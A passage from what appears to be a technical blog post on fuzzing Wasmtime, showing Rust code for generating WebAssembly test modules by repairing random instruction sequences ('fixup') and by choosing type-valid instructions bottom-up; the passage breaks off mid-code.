    <span class="nf">F32Const</span><span class="p">(</span><span class="nb">f32</span><span class="p">),</span>
    <span class="n">F32Add</span><span class="p">,</span>
    <span class="n">F32Sub</span><span class="p">,</span>
    <span class="n">F32Mul</span><span class="p">,</span>

    <span class="c1">// ...</span>

    <span class="nf">F64Const</span><span class="p">(</span><span class="nb">f64</span><span class="p">),</span>
    <span class="n">F64Add</span><span class="p">,</span>
    <span class="n">F64Sub</span><span class="p">,</span>
    <span class="n">F64Mul</span><span class="p">,</span>

    <span class="c1">// ...</span>

    <span class="n">I32WrapI64</span><span class="p">,</span>
    <span class="n">I64ExtendI32S</span><span class="p">,</span>
    <span class="n">I64ExtendI32U</span><span class="p">,</span>

    <span class="c1">// ...</span>

    <span class="nf">V128Const</span><span class="p">(</span><span class="nb">i128</span><span class="p">),</span>
    <span class="n">I8x16Add</span><span class="p">,</span>
    <span class="n">I8x16Sub</span><span class="p">,</span>

    <span class="c1">// ...</span>

    <span class="nf">I32Load</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>
    <span class="nf">I64Load</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>

    <span class="c1">// ...</span>

    <span class="nf">I32Store</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>
    <span class="nf">I64Store</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>

    <span class="c1">// ...</span>

    <span class="nf">MemorySize</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>
    <span class="nf">MemoryGrow</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>
<span class="p">}</span>
</code></pre></div></div>

<p>There is an <code class="language-plaintext highlighter-rouge">Inst::operand_types</code> method that returns the types that the
instruction pops from the stack, and an <code class="language-plaintext highlighter-rouge">Inst::result_type</code> method that returns
the type of the value that the instruction pushes onto the stack, if
any. Finally, the <code class="language-plaintext highlighter-rouge">Module::to_wasm_binary</code> method encodes the module into
WebAssembly’s binary format, so it can be fed into Wasmtime. These methods are
used, directly or indirectly, in every generator and mutator implementation.</p>

<h4><code class="language-plaintext highlighter-rouge">arb</code></h4>

<p>The <code class="language-plaintext highlighter-rouge">arb</code> generator leverages <code class="language-plaintext highlighter-rouge">derive(arbitrary::Arbitrary)</code> on our structured
input types to generate a pseudorandom instance of <code class="language-plaintext highlighter-rouge">Module</code>, unconstrained by
validity. The module’s instruction sequence is almost certainly not valid at
this point: it likely is missing operands for instructions, producing more
results than the function’s signature describes, producing results of types that
don’t match the function signature, accessing globals and locals that don’t
exist, etc… Having produced an instance of <code class="language-plaintext highlighter-rouge">Module</code>, it next calls the
<code class="language-plaintext highlighter-rouge">Module::fixup</code> method to mutate the <code class="language-plaintext highlighter-rouge">Module</code> so that it is valid.</p>

<p>The <code class="language-plaintext highlighter-rouge">fixup</code> method works by abstractly interpreting the instruction sequence to
track the types of each value on the stack at every program point. Whenever an
instruction’s operand types don’t match the types on top of the stack, it
generates dummy values of the correct type. When the instructions produce more
values than the function’s signature proscribes, it emits <code class="language-plaintext highlighter-rouge">drop</code> instructions.</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">impl</span> <span class="n">Module</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">fixup</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="k">mut</span> <span class="n">make_value</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">FnMut</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">i64</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// ...</span>

        <span class="c1">// The fixed-up instructions.</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">fixed</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">with_capacity</span><span class="p">(</span>
            <span class="k">self</span><span class="py">.instructions</span><span class="nf">.len</span><span class="p">(),</span>
        <span class="p">);</span>

        <span class="c1">// The types on the stack at any given program</span>
        <span class="c1">// point. Similar to the Wasm spec's appendix's</span>
        <span class="c1">// validation algorithm.</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">stack</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">ValType</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>

        <span class="k">for</span> <span class="n">inst</span> <span class="k">in</span> <span class="nn">mem</span><span class="p">::</span><span class="nf">take</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="py">.instructions</span><span class="p">)</span> <span class="p">{</span>
            <span class="c1">// Special-case `drop` because it is</span>
            <span class="c1">// polymorphic.</span>
            <span class="k">if</span> <span class="nd">matches!</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="nn">Inst</span><span class="p">::</span><span class="nb">Drop</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">if</span> <span class="n">stack</span><span class="nf">.is_empty</span><span class="p">()</span> <span class="p">{</span>
                    <span class="n">fixed</span><span class="nf">.push</span><span class="p">(</span>
                        <span class="nn">ValType</span><span class="p">::</span><span class="n">I32</span><span class="nf">.make_const</span><span class="p">(</span><span class="nf">make_value</span><span class="p">()),</span>
                    <span class="p">);</span>
                <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                    <span class="n">stack</span><span class="nf">.pop</span><span class="p">();</span>
                <span class="p">}</span>
                <span class="n">fixed</span><span class="nf">.push</span><span class="p">(</span><span class="n">inst</span><span class="p">);</span>
                <span class="k">continue</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="c1">// First clamp entity indices to valid</span>
            <span class="c1">// ranges.</span>
            <span class="k">let</span> <span class="nf">Some</span><span class="p">(</span><span class="n">inst</span><span class="p">)</span> <span class="o">=</span> <span class="k">self</span><span class="nf">.fixup_inst_immediates</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="k">mut</span> <span class="n">make_value</span><span class="p">,</span>
                <span class="n">has_mutable_global</span><span class="p">,</span>
                <span class="n">inst</span><span class="p">,</span>
            <span class="p">)</span> <span class="k">else</span> <span class="p">{</span>
                <span class="k">continue</span>
            <span class="p">};</span>

            <span class="c1">// Then make sure that the stack has</span>
            <span class="c1">// operands of the correct types for this</span>
            <span class="c1">// instruction.</span>
            <span class="k">self</span><span class="nf">.fixup_stack</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="k">mut</span> <span class="n">make_value</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="k">mut</span> <span class="n">fixed</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">inst</span><span class="p">,</span>
            <span class="p">);</span>

            <span class="c1">// Finally, apply the effects to the stack.</span>
            <span class="k">let</span> <span class="n">len_operands</span> <span class="o">=</span> <span class="n">inst</span><span class="nf">.operand_types</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="k">self</span><span class="py">.globals</span><span class="p">,</span>
            <span class="p">)</span><span class="nf">.len</span><span class="p">();</span>
            <span class="n">stack</span><span class="nf">.truncate</span><span class="p">(</span><span class="n">stack</span><span class="nf">.len</span><span class="p">()</span> <span class="o">-</span> <span class="n">len_operands</span><span class="p">);</span>
            <span class="n">stack</span><span class="nf">.extend</span><span class="p">(</span><span class="n">inst</span><span class="nf">.result_type</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="k">self</span><span class="py">.param_types</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="k">self</span><span class="py">.globals</span><span class="p">,</span>
            <span class="p">));</span>

            <span class="n">fixed</span><span class="nf">.push</span><span class="p">(</span><span class="n">inst</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// ...</span>

        <span class="k">self</span><span class="py">.instructions</span> <span class="o">=</span> <span class="n">fixed</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">fn</span> <span class="nf">fixup_stack</span><span class="p">(</span>
        <span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span>
        <span class="k">mut</span> <span class="n">make_value</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">FnMut</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">i64</span><span class="p">,</span>
        <span class="n">fixed</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span><span class="p">,</span>
        <span class="n">stack</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">ValType</span><span class="o">&gt;</span><span class="p">,</span>
        <span class="n">inst</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">Inst</span><span class="p">,</span>
    <span class="p">)</span> <span class="p">{</span>
        <span class="k">let</span> <span class="n">needed</span> <span class="o">=</span> <span class="n">inst</span><span class="nf">.operand_types</span><span class="p">(</span><span class="o">&amp;</span><span class="k">self</span><span class="py">.globals</span><span class="p">);</span>
        <span class="k">let</span> <span class="n">n</span> <span class="o">=</span> <span class="n">needed</span><span class="nf">.len</span><span class="p">();</span>

        <span class="k">if</span> <span class="n">stack</span><span class="nf">.len</span><span class="p">()</span> <span class="o">&gt;=</span> <span class="n">n</span> <span class="p">{</span>
            <span class="k">if</span> <span class="p">(</span><span class="mi">0</span><span class="o">..</span><span class="n">n</span><span class="p">)</span><span class="nf">.all</span><span class="p">(|</span><span class="n">i</span><span class="p">|</span> <span class="p">{</span>
                <span class="n">stack</span><span class="p">[</span><span class="n">stack</span><span class="nf">.len</span><span class="p">()</span> <span class="o">-</span> <span class="n">n</span> <span class="o">+</span> <span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="n">needed</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
            <span class="p">})</span> <span class="p">{</span>
                <span class="c1">// All needed operands are on the stack.</span>
                <span class="k">return</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">stack</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.enumerate</span><span class="p">()</span><span class="nf">.all</span><span class="p">(|(</span><span class="n">i</span><span class="p">,</span> <span class="n">ty</span><span class="p">)|</span> <span class="p">{</span>
                <span class="o">*</span><span class="n">ty</span> <span class="o">==</span> <span class="n">needed</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
            <span class="p">})</span> <span class="p">{</span>
                <span class="c1">// A prefix of needed operands are on the</span>
                <span class="c1">// stack; make constants for the tail that</span>
                <span class="c1">// are missing.</span>
                <span class="k">for</span> <span class="n">ty</span> <span class="k">in</span> <span class="o">&amp;</span><span class="n">needed</span><span class="p">[</span><span class="n">stack</span><span class="nf">.len</span><span class="p">()</span><span class="o">..</span><span class="p">]</span> <span class="p">{</span>
                    <span class="n">fixed</span><span class="nf">.push</span><span class="p">(</span><span class="n">ty</span><span class="nf">.make_const</span><span class="p">(</span><span class="nf">make_value</span><span class="p">()));</span>
                    <span class="n">stack</span><span class="nf">.push</span><span class="p">(</span><span class="o">*</span><span class="n">ty</span><span class="p">);</span>
                <span class="p">}</span>
                <span class="k">return</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span>

        <span class="c1">// Otherwise, just make constants for all the</span>
        <span class="c1">// needed operands.</span>
        <span class="k">for</span> <span class="n">ty</span> <span class="k">in</span> <span class="n">needed</span> <span class="p">{</span>
            <span class="n">fixed</span><span class="nf">.push</span><span class="p">(</span><span class="n">ty</span><span class="nf">.make_const</span><span class="p">(</span><span class="nf">make_value</span><span class="p">()));</span>
            <span class="n">stack</span><span class="nf">.push</span><span class="p">(</span><span class="o">*</span><span class="n">ty</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// ...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">fixup</code> method also makes sure that for all instructions that have an
immediate referencing some entity, the referenced entity is valid. For example,
for a <code class="language-plaintext highlighter-rouge">local.get $l</code> instruction, it ensures that local <code class="language-plaintext highlighter-rouge">$l</code> actually exists or
else rewrites the local to one that does exist.</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">impl</span> <span class="n">Module</span> <span class="p">{</span>
    <span class="c1">// ...</span>

    <span class="k">fn</span> <span class="nf">fixup_inst_immediates</span><span class="p">(</span>
        <span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span>
        <span class="k">mut</span> <span class="n">make_value</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">FnMut</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">i64</span><span class="p">,</span>
        <span class="n">has_mutable_global</span><span class="p">:</span> <span class="nb">bool</span><span class="p">,</span>
        <span class="k">mut</span> <span class="n">inst</span><span class="p">:</span> <span class="n">Inst</span><span class="p">,</span>
    <span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Option</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="k">match</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">inst</span> <span class="p">{</span>
            <span class="nn">Inst</span><span class="p">::</span><span class="nf">LocalGet</span><span class="p">(</span><span class="n">l</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="o">*</span><span class="n">l</span> <span class="o">%=</span> <span class="k">self</span><span class="py">.param_types</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">,</span>

            <span class="c1">// ...</span>

            <span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
            <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">I64Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
            <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">F32Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
            <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">F64Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
            <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">V128Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
                <span class="k">if</span> <span class="k">self</span><span class="py">.num_memories</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">{</span>
                    <span class="k">return</span> <span class="nb">None</span><span class="p">;</span>
                <span class="p">}</span>
                <span class="o">*</span><span class="n">m</span> <span class="o">%=</span> <span class="k">self</span><span class="py">.num_memories</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="c1">// ...</span>

            <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{}</span>
        <span class="p">}</span>

        <span class="nf">Some</span><span class="p">(</span><span class="n">inst</span><span class="p">)</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After calling <code class="language-plaintext highlighter-rouge">fixup</code>, the <code class="language-plaintext highlighter-rouge">arb</code> generator invokes <code class="language-plaintext highlighter-rouge">Module::to_wasm_binary</code> to
get the encoded Wasm program.</p>

<h4><code class="language-plaintext highlighter-rouge">bottom_up</code></h4>

<p>The <code class="language-plaintext highlighter-rouge">bottom_up</code> generator also uses abstract interpretation to track the types
of values on the stack. It generates instructions in forwards order, from
operands to operators. It begins with an empty stack, filters candidate
instructions down to just those that would be valid given the types currently on
the stack, randomly chooses one, updates the stack types accordingly, and
repeats the process. This is the same approach that <a href="https://docs.rs/wasm-smith"><code class="language-plaintext highlighter-rouge">wasm-smith</code></a> uses. After
generating instructions this way, it then makes sure that the final types on the
stack match the function signature’s results, similar to the end of <code class="language-plaintext highlighter-rouge">fixup</code>.</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">impl</span> <span class="n">Module</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">bottom_up</span><span class="p">(</span><span class="n">u</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">Unstructured</span><span class="o">&lt;</span><span class="nv">'_</span><span class="o">&gt;</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">Self</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// ...</span>

        <span class="k">let</span> <span class="n">max_insts</span> <span class="o">=</span> <span class="n">u</span><span class="nf">.int_in_range</span><span class="p">(</span><span class="mi">1</span><span class="o">..=</span><span class="n">MAX_INSTS</span><span class="p">)</span><span class="o">?</span><span class="p">;</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">instructions</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">stack</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">ValType</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>

        <span class="k">for</span> <span class="n">_</span> <span class="k">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">max_insts</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">stack</span> <span class="o">==</span> <span class="n">result_types</span> <span class="o">&amp;&amp;</span> <span class="n">u</span><span class="nf">.ratio</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span><span class="o">?</span> <span class="p">{</span>
                <span class="k">break</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="c1">// Choose a random instruction whose operand</span>
            <span class="c1">// types match those currently on the stack.</span>
            <span class="k">let</span> <span class="n">inst</span> <span class="o">=</span> <span class="nf">choose_inst_bottom_up</span><span class="p">(</span>
                <span class="n">u</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">stack</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">param_types</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">globals</span><span class="p">,</span>
                <span class="n">num_memories</span><span class="p">,</span>
            <span class="p">)</span><span class="o">?</span><span class="p">;</span>

            <span class="c1">// Apply this instruction's effects to the</span>
            <span class="c1">// stack.</span>
            <span class="nf">apply_inst</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="n">inst</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">param_types</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">globals</span><span class="p">,</span>
            <span class="p">);</span>
            <span class="n">instructions</span><span class="nf">.push</span><span class="p">(</span><span class="n">inst</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// ...</span>

        <span class="nf">Ok</span><span class="p">(</span><span class="n">Module</span> <span class="p">{</span>
            <span class="n">param_types</span><span class="p">,</span>
            <span class="n">result_types</span><span class="p">,</span>
            <span class="n">globals</span><span class="p">,</span>
            <span class="n">num_memories</span><span class="p">,</span>
            <span class="n">instructions</span><span class="p">,</span>
        <span class="p">})</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">fn</span> <span class="nf">choose_inst_bottom_up</span><span class="p">(</span>
    <span class="n">u</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">Unstructured</span><span class="o">&lt;</span><span class="nv">'_</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">stack</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="n">ValType</span><span class="p">],</span>
    <span class="n">param_types</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="n">ValType</span><span class="p">],</span>
    <span class="n">globals</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="n">Global</span><span class="p">],</span>
    <span class="n">num_memories</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="c1">// Build up all the valid candidate instructions.</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">candidates</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>

    <span class="c1">// Producers are always okay: [] -&gt; [t]</span>
    <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Const</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
    <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">I64Const</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
    <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">F32Const</span><span class="p">(</span><span class="mf">0.0</span><span class="p">));</span>
    <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">F64Const</span><span class="p">(</span><span class="mf">0.0</span><span class="p">));</span>
    <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">V128Const</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
    <span class="k">if</span> <span class="o">!</span><span class="n">param_types</span><span class="nf">.is_empty</span><span class="p">()</span> <span class="p">{</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">LocalGet</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
    <span class="p">}</span>

    <span class="c1">// ...</span>

    <span class="k">let</span> <span class="n">top</span> <span class="o">=</span> <span class="n">stack</span><span class="nf">.last</span><span class="p">()</span><span class="nf">.copied</span><span class="p">();</span>
    <span class="k">let</span> <span class="n">second</span> <span class="o">=</span> <span class="n">stack</span><span class="nf">.get</span><span class="p">(</span><span class="n">stack</span><span class="nf">.len</span><span class="p">()</span> <span class="o">-</span> <span class="mi">2</span><span class="p">)</span><span class="nf">.copied</span><span class="p">();</span>

    <span class="c1">// Drop needs 1 operand of any type: [t] -&gt; []</span>
    <span class="k">if</span> <span class="n">top</span><span class="nf">.is_some</span><span class="p">()</span> <span class="p">{</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nb">Drop</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// i32 unary: [i32] -&gt; [...]</span>
    <span class="k">if</span> <span class="n">top</span> <span class="o">==</span> <span class="nf">Some</span><span class="p">(</span><span class="n">I32</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Clz</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Ctz</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Popcnt</span><span class="p">);</span>
        <span class="c1">// ...</span>
    <span class="p">}</span>

    <span class="c1">// i64 unary: [i64] -&gt; [...]</span>
    <span class="k">if</span> <span class="n">top</span> <span class="o">==</span> <span class="nf">Some</span><span class="p">(</span><span class="n">I64</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Clz</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Ctz</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Popcnt</span><span class="p">);</span>
        <span class="c1">// ...</span>
    <span class="p">}</span>

    <span class="c1">// ...</span>

    <span class="c1">// i32 binary: [i32 i32] -&gt; [...]</span>
    <span class="k">if</span> <span class="n">top</span> <span class="o">==</span> <span class="nf">Some</span><span class="p">(</span><span class="n">I32</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">second</span> <span class="o">==</span> <span class="nf">Some</span><span class="p">(</span><span class="n">I32</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Add</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Sub</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Mul</span><span class="p">);</span>
        <span class="c1">// ...</span>
    <span class="p">}</span>

    <span class="c1">// i64 binary: [i64 i64] -&gt; [...]</span>
    <span class="k">if</span> <span class="n">top</span> <span class="o">==</span> <span class="nf">Some</span><span class="p">(</span><span class="n">I64</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">second</span> <span class="o">==</span> <span class="nf">Some</span><span class="p">(</span><span class="n">I64</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Add</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Sub</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Mul</span><span class="p">);</span>
        <span class="c1">// ...</span>
    <span class="p">}</span>

    <span class="c1">// ...</span>

    <span class="c1">// Choose a random instruction from the</span>
    <span class="c1">// candidates.</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">inst</span> <span class="o">=</span> <span class="o">*</span><span class="n">u</span><span class="nf">.choose</span><span class="p">(</span><span class="o">&amp;</span><span class="n">candidates</span><span class="p">)</span><span class="o">?</span><span class="p">;</span>

    <span class="c1">// If the instruction has immediates, generate</span>
    <span class="c1">// them here, as they were hard-coded during</span>
    <span class="c1">// candidate selection.</span>
    <span class="k">match</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">inst</span> <span class="p">{</span>
        <span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Const</span><span class="p">(</span><span class="n">v</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="o">*</span><span class="n">v</span> <span class="o">=</span> <span class="n">u</span><span class="nf">.arbitrary</span><span class="p">()</span><span class="o">?</span><span class="p">,</span>
        <span class="nn">Inst</span><span class="p">::</span><span class="nf">I64Const</span><span class="p">(</span><span class="n">v</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="o">*</span><span class="n">v</span> <span class="o">=</span> <span class="n">u</span><span class="nf">.arbitrary</span><span class="p">()</span><span class="o">?</span><span class="p">,</span>
        <span class="c1">// ...</span>
        <span class="nn">Inst</span><span class="p">::</span><span class="nf">GlobalGet</span><span class="p">(</span><span class="n">g</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="o">*</span><span class="n">g</span> <span class="o">=</span> <span class="n">u</span><span class="nf">.int_in_range</span><span class="p">(</span><span class="mi">0</span><span class="o">..=</span><span class="p">(</span><span class="n">globals</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span> <span class="o">-</span> <span class="mi">1</span><span class="p">))</span><span class="o">?</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="c1">// ...</span>
        <span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">I64Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">F32Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">F64Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">V128Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Store</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">I64Store</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">F32Store</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">F64Store</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">V128Store</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">MemorySize</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">MemoryGrow</span><span class="p">(</span><span class="n">m</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
